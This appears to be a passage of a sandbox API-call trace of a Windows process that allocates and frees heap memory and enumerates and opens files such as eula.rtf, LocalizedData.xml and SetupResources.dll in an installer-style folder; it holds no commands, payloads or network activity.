0x88450 [0060.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.252] AreFileApisANSI () returned 1 [0060.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69170 [0060.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 36 [0060.252] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe8e)) returned 1 [0060.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0060.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.252] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.252] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.252] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13c4a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.252] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.252] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0060.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0060.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0060.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0060.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0060.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0060.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0060.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0060.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0060.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0060.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0060.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0060.253] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.253] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.253] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.253] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0060.253] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.253] AreFileApisANSI () returned 1 [0060.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0060.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0060.253] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.253] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0060.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0060.254] AreFileApisANSI () returned 1 [0060.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0060.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 45 [0060.254] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.254] GetFileType (hFile=0x420) returned 0x1 [0060.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.255] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.255] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.255] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.255] CloseHandle (hObject=0x420) returned 1 [0060.255] AreFileApisANSI () returned 1 [0060.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71688 [0060.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 45 [0060.255] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.255] GetFileType (hFile=0x420) returned 0x1 [0060.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0060.256] CloseHandle (hObject=0x420) returned 1 [0060.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0060.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0060.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0060.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0060.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.256] AreFileApisANSI () returned 1 [0060.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x716f0 [0060.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x716f0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 45 [0060.257] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13c4a)) returned 1 [0060.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0060.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0060.257] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.257] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.257] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0060.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0060.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0060.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0060.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0060.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0060.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0060.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0060.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0060.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.257] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.258] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.258] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.258] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0060.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0060.258] AreFileApisANSI () returned 1 [0060.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1029\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1029\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0060.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.258] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.258] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0060.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0060.258] AreFileApisANSI () returned 1 [0060.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b00 [0060.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 46 [0060.258] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.258] GetFileType (hFile=0x420) returned 0x1 [0060.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0060.258] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.259] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.259] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.259] CloseHandle (hObject=0x420) returned 1 [0060.259] AreFileApisANSI () returned 1 [0060.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71bd0 [0060.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 46 [0060.259] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.259] GetFileType (hFile=0x420) returned 0x1 [0060.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0060.259] CloseHandle (hObject=0x420) returned 1 [0060.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0060.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0060.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0060.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0060.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0060.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0060.420] RtlAllocateHeap 